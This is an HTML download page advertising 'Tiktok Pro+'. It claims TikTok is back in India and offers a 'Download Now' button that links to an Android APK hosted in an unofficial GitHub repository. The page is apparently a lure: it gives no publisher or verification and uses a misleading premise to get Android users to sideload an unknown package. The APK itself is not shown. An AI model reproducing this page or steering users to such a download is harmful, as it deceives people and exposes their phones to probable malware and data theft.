
<html>
    
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<head>
    <Title>Download</Title>
    <style>
        body{
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }
.squareline {
  border: 6px solid;
  overflow:hidden;
  border-color: #e30750;
}
.dabavanu {
	background-color:#e30750;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #e30750;
}
.dabavanu:hover {
	background-color:#e30750;
}
.dabavanusw {
	background-color:#e30750;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #e30750;
}
.dabavanu:active {
	position:relative;
	top:1px;
}

    </style>
</head>
<body>
<center>
    <div class="squareline">
        <img src="https://i.postimg.cc/XYkfTRFj/TIKTOK-analytics.jpg"  height="260"/>
        <h2>Tiktok Pro+</h2><h3>
        Tiktok is back in India. Enjoy<br>
Tiktok video and features again.<br>
Only for Android-Phones<br>
Click here to Download and Install Tiktok-star</h3>
        <div onclick="window.location='https://github.com/tech9as/io/raw/main/Tiktok_pros.apk'"  class="dabavanu">Download Now</a>


        


    </div>
</center>
</html>